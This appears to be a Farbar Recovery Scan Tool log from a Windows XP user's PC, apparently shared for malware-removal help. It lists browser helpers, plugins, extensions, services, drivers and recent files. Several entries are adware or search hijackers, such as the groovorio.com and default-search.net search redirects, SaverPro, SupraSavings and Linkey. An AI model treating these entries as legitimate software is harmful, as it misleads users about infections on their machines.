SearchScopes: HKCU - DefaultScope {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
SearchScopes: HKCU - {8E20B32C-2985-498A-9825-EC35F6F21877} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=994519_yserp3tst&p={searchTerms}
SearchScopes: HKCU - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2516} URL = http://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p={searchTerms}
SearchScopes: HKCU - {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
BHO: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll (Hewlett-Packard Co.)
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! WebRep -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: SaverPro -> {B1C50D68-A112-A194-98C5-6E673EC9E3A8} -> C:\Documents and Settings\All Users\Application Data\SaverPro\HeV0cV.dll No File
BHO: MSN Toolbar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKLM - Acer eDataSecurity Management - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
Toolbar: HKLM - MSN Toolbar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} http://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} http://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
ShellExecuteHooks: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [113024 2011-07-18] (SuperAdBlocker.com)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 69.144.127.53 68.116.46.115 71.9.127.107

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default
FF DefaultSearchEngine: default-search.net
FF SearchEngineOrder.1: default-search.net
FF SelectedSearchEngine: default-search.net
FF Homepage: hxxp://www.google.com/
FF Keyword.URL: hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/MycameraPlugin -> C:\Program Files\Canon\ZoomBrowser EX\Program\NPCIG.dll (CANON INC.)
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=4.0 -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\\NPRobloxProxy.dll ( ROBLOX Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll (Apple Inc.)
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\default-search.xml
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\Groovorio.xml
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\utorrentcontrolv2-customized-web-search.xml
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\default-search.xml
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\istart123.xml
FF Extension: Linkey for Firefox - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\extension@linkeyproject.com [2014-08-10]
FF Extension: Move Media Player - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\moveplayer@movenetworks.com [2009-04-04]
FF Extension: SaverPro - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\oilf@xavpaie.edu [2014-08-10]
FF Extension: SupraSavings - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\j003-lqgrmgpcekslhg@jetpack.xpi [2014-07-11]
FF Extension: Torrent Finder Toolbar - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\TFToolbarX@torrent-finder.xpi [2012-10-03]
FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2012-02-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-08-10]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-22]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-09-19]
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox
FF Extension: MSN Toolbar - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox [2011-09-19]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2011-09-21]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-09-05]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3

Chrome:
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://wwww.google.com/"
CHR Extension: (Google Drive) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-03-21]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (YouTube) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-03-21]
CHR Extension: (Google Search) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-03-21]
CHR Extension: (Video Pinner) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\egfhbaheiflmihggjcfmnmchkijkcdpl [2014-08-10]
CHR Extension: (Linkey) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah [2014-08-10]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-09]
CHR Extension: (Gmail) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-03-21]
CHR HKLM\...\Chrome\Extension: [fpmeembnagmagppkgghhfjfdfajdfcah] - C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey\ChromeExtension\ChromeExtension.crx [2014-08-10]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE.EXE [116608 2011-08-11] (SUPERAntiSpyware.com) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [46808 2013-05-09] (AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [137960 2013-05-09] (AVAST Software)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182184 2013-07-20] (Oracle Corporation)
S3 MozillaMaintenance; C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe [119408 2014-08-10] (Mozilla Foundation) [File not signed]
R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [44032 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53760 2010-08-06] (Hewlett-Packard) [File not signed]
R2 SmdmFService; C:\Program Files\Settings Manager\smdmf\SmdmFService.exe [3572240 2014-07-28] (Aztec Media Inc) [File not signed]
S3 SupportSoft RemoteAssist; C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe [394608 2008-01-08] (SupportSoft, Inc.)
S4 Amazon Download Agent; C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe [X]
S4 Automatic LiveUpdate Scheduler; "C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe" [X]
S2 IntuitUpdateService; "C:\Program Files\Common Files\Intuit\Update Service\IntuitUpdateService.exe" [X]
S2 LightScribeService; "c:\Program Files\Common Files\LightScribe\LSSrvc.exe" [X]
S4 LiveUpdate; "C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE" [X]
S2 sprtlisten; C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe /identity QUICKASSIST    [X]
S4 Symantec Core LC; "C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe" [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswFsBlk; C:\WINDOWS\system32\Drivers\aswFsBlk.sys [29816 2013-05-09] (AVAST Software)
R1 aswFW; C:\WINDOWS\system32\Drivers\aswFW.sys [104752 2013-05-09] (AVAST Software)
R0 aswKbd; C:\WINDOWS\system32\Drivers\aswKbd.sys [21576 2013-05-09] (AVAST Software)
R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [66336 2013-05-09] (AVAST Software)
R0 aswNdis; C:\WINDOWS\System32\DRIVERS\aswNdis.sys [12112 2011-07-04] (ALWIL Software)
R0 aswNdis2; C:\WINDOWS\system32\Drivers\aswNdis2.sys [204784 2013-05-09] (AVAST Software)
R1 aswRdr; C:\WINDOWS\system32\Drivers\aswRdr.sys [49760 2013-05-09] (AVAST Software)
R0 aswRvrt; C:\WINDOWS\system32\Drivers\aswRvrt.sys [49376 2013-05-09] ()
R1 aswSnx; C:\WINDOWS\system32\Drivers\aswSnx.sys [770344 2013-06-30] (AVAST Software)
R1 aswSP; C:\WINDOWS\system32\Drivers\aswSP.sys [369584 2013-06-30] (AVAST Software)
R1 aswTdi; C:\WINDOWS\system32\Drivers\aswTdi.sys [56080 2013-05-09] (AVAST Software)
R0 aswVmm; C:\WINDOWS\system32\Drivers\aswVmm.sys [175176 2013-06-30] ()
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [376480 2012-07-29] (Symantec Corporation)
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622; C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg [34192 2014-07-28] (Aztec Media Inc) [File not signed]
R3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2009-08-05] (HP)
R3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2009-08-05] (HP)
R3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2009-08-05] (HP)
R1 netfilter; C:\WINDOWS\System32\drivers\netfilter.sys [47488 2014-07-11] (NetFilterSDK.com) [File not signed]
R3 NTIDrvr; C:\WINDOWS\System32\DRIVERS\NTIDrvr.sys [6144 2006-07-19] (NewTech Infosystems, Inc.) [File not signed]
R3 psdfilter; C:\WINDOWS\system32\Drivers\psdfilter.sys [12288 2006-04-07] (HiTRUST) [File not signed]
R3 psdvdisk; C:\WINDOWS\system32\Drivers\psdvdisk.sys [60416 2006-03-08] (HiTRUST) [File not signed]
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS [12880 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS [67664 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R2 symlcbrd; C:\WINDOWS\system32\drivers\symlcbrd.sys [10344 2007-04-18] (Symantec Corporation)
R0 UBHelper; C:\WINDOWS\system32\Drivers\UBHelper.sys [13952 2004-12-16] () [File not signed]
R3 yukonwxp; C:\WINDOWS\System32\DRIVERS\yk51x86.sys [244864 2006-06-28] (Marvell)
S3 ZD1211BU(ZyDAS); C:\WINDOWS\System32\DRIVERS\zd1211Bu.sys [402432 2005-10-28] (ZyDAS Technology Corporation)
S3 ZD1211U(ZyDAS); C:\WINDOWS\System32\DRIVERS\zd1211u.sys [280064 2005-10-04] (ZyDAS Technology Corporation)
R3 ZDPSp50; C:\WINDOWS\System32\Drivers\ZDPSp50.sys [17664 2004-10-25] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 06624408; No ImagePath
S3 catchme; \??\C:\combofix\catchme.sys [X]
S4 IntelIde; No ImagePath
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
S1 ssnfd; system32\drivers\ssnfd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-21 21:35 - 2014-08-21 21:35 - 00000000 ____D () C:\FRST
2014-08-21 21:31 - 2014-08-21 21:31 - 00000000 ____D () C:\WINDOWS\LastGood
2014-08-18 22:58 - 2014-08-18 22:58 - 00000000 ____D () C:\4ea9f4d50c4d13298e29e45991c07f
2014-08-18 22:57 - 2014-08-18 22:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2770660$
2014-08-18 22:56 - 2014-08-18 22:56 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2850869$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2876331$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2859537$
2014-08-18 22:54 - 2014-08-18 22:55 - 00136378 _____ () C:\WINDOWS\KB2807986.log
2014-08-18 22:54 - 2014-08-18 22:54 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2807986$
2014-08-18 22:44 - 2014-08-10 19:33 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20140818-224430.backup
2014-08-18 22:43 - 2014-08-18 22:43 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2868038$
2014-08-18 22:42 - 2014-08-18 22:43 - 00133967 _____ () C:\WINDOWS\KB2868038.log
2014-08-18 22:41 - 2014-08-18 22:41 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2820917$
2014-08-18 22:37 - 2014-08-18 22:37 - 00133872 _____ () C:\WINDOWS\KB2603381.log
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2893294$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2757638$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2603381$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2749655$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2653956$
2014-08-18 22:32 - 2014-08-18 22:32 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2892075$
2014-08-18 22:31 - 2014-08-18 22:32 - 00013937 _____ () C:\WINDOWS\KB2698365.log
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2698365$
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2619339$
2014-08-18 22:30 - 2014-08-18 22:30 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2705219-v2$
2014-08-18 22:25 - 2014-08-18 22:25 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2014-08-18 22:24 - 2014-08-18 22:25 - 00012472 _____ () C:\WINDOWS\KB2723135-v2.log
2014-08-18 22:24 - 2014-08-18 22:24 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2723135-v2$
2014-08-18 22:23 - 2014-08-18 22:23 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2862330$
2014-08-18 22:18 - 2014-08-18 22:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2813345$
2014-08-18 22:14 - 2014-08-18 22:14 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2014-08-18 21:42 - 2014-08-18 21:42 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2620712$
2014-08-18 21:40 - 2014-08-18 21:40 - 00008357 _____ () C:\WINDOWS\KB2914368.log
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2914368$
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2584146$
2014-08-17 12:54 - 2014-08-17 21:42 - 00015602 _____ () C:\Documents and Settings\Jay\Desktop\Stock Tracker.xlsx
2014-08-17 12:54 - 2014-08-17 12:54 - 00000165 ____H () C:\Documents and Settings\Jay\Desktop\~$Stock Tracker.xlsx
2014-08-17 12:01 - 2014-08-21 12:47 - 00011954 _____ () C:\WINDOWS\KB2916036.log
2014-08-17 12:01 - 2014-08-21 12:47 - 00011952 _____ () C:\WINDOWS\KB2922229.log
2014-08-17 12:01 - 2014-08-21 12:47 - 00011944 _____ () C:\WINDOWS\KB2868626.log
2014-08-17 12:00 - 2014-08-21 21:32 - 00011864 _____ () C:\WINDOWS\KB2929961.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00086464 _____ () C:\WINDOWS\KB2936068-IE7.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011944 _____ () C:\WINDOWS\KB2847311.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011867 _____ () C:\WINDOWS\KB2898715.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011779 _____ () C:\WINDOWS\KB2802968.log
2014-08-17 12:00 - 2014-08-21 12:45 - 00012862 _____ () C:\WINDOWS\KB2909212.log
2014-08-17 11:59 - 2014-08-21 12:39 - 00011708 _____ () C:\WINDOWS\KB2780091.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00012559 _____ () C:\WINDOWS\KB2930275.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011815 _____ () C:\WINDOWS\KB2862152.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011785 _____ () C:\WINDOWS\KB2876217.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011779 _____ () C:\WINDOWS\KB2864063.log
2014-08-17 11:40 - 2014-08-18 22:56 - 00142501 _____ () C:\WINDOWS\KB2850869.log
2014-08-17 11:40 - 2014-08-18 22:55 - 00141957 _____ () C:\WINDOWS\KB2876331.log
2014-08-17 11:39 - 2014-08-18 22:55 - 00142756 _____ () C:\WINDOWS\KB2859537.log
2014-08-17 11:39 - 2014-08-18 22:42 - 00142864 _____ () C:\WINDOWS\KB2820917.log
2014-08-17 11:39 - 2014-08-18 22:37 - 00141918 _____ () C:\WINDOWS\KB2757638.log
2014-08-17 11:39 - 2014-08-18 22:37 - 00139690 _____ () C:\WINDOWS\KB2893294.log
2014-08-17 11:39 - 2014-08-18 22:35 - 00142032 _____ () C:\WINDOWS\KB2749655.log
2014-08-17 11:39 - 2014-08-18 22:32 - 00018123 _____ () C:\WINDOWS\KB2892075.log
2014-08-17 11:39 - 2014-08-18 22:30 - 00020643 _____ () C:\WINDOWS\KB2705219-v2.log
2014-08-17 11:39 - 2014-08-18 22:25 - 00019333 _____ () C:\WINDOWS\KB2727528.log
2014-08-17 11:38 - 2014-08-21 21:32 - 00010910 _____ () C:\WINDOWS\KB2691442.log
2014-08-17 11:38 - 2014-08-21 21:32 - 00010850 _____ () C:\WINDOWS\KB2719985.log
2014-08-17 11:38 - 2014-08-21 12:47 - 00011022 _____ () C:\WINDOWS\KB2712808.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00011131 _____ () C:\WINDOWS\KB2655992.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010938 _____ () C:\WINDOWS\KB2585542.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010691 _____ () C:\WINDOWS\KB2631813.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010600 _____ () C:\WINDOWS\KB2598479.log
2014-08-17 11:37 - 2014-08-18 22:35 - 00139623 _____ () C:\WINDOWS\KB2653956.log
2014-08-17 11:37 - 2014-08-18 22:31 - 00019056 _____ () C:\WINDOWS\KB2619339.log
2014-08-17 11:30 - 2014-08-18 22:19 - 00019733 _____ () C:\WINDOWS\KB2813345.log
2014-08-17 11:30 - 2014-08-18 22:15 - 00021923 _____ () C:\WINDOWS\KB2676562.log
2014-08-17 11:28 - 2014-08-18 21:43 - 00017799 _____ () C:\WINDOWS\KB2620712.log
2014-08-17 11:25 - 2014-08-18 21:40 - 00016947 _____ () C:\WINDOWS\KB2584146.log
2014-08-16 15:40 - 2014-08-16 15:40 - 00000000 ____D () C:\Program Files\predm
2014-08-10 19:59 - 2014-08-15 22:54 - 00022758 _____ () C:\Documents and Settings\Jay\Desktop\attach.txt
2014-08-10 19:59 - 2014-08-15 22:54 - 00018225 _____ () C:\Documents and Settings\Jay\Desktop\dds.txt
2014-08-10 19:57 - 2014-08-10 19:59 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ea5b54591d578367
2014-08-10 19:46 - 2014-08-14 23:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Browser System Enahncer
2014-08-10 19:46 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\2308189059
2014-08-10 19:41 - 2014-08-21 21:36 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\temp
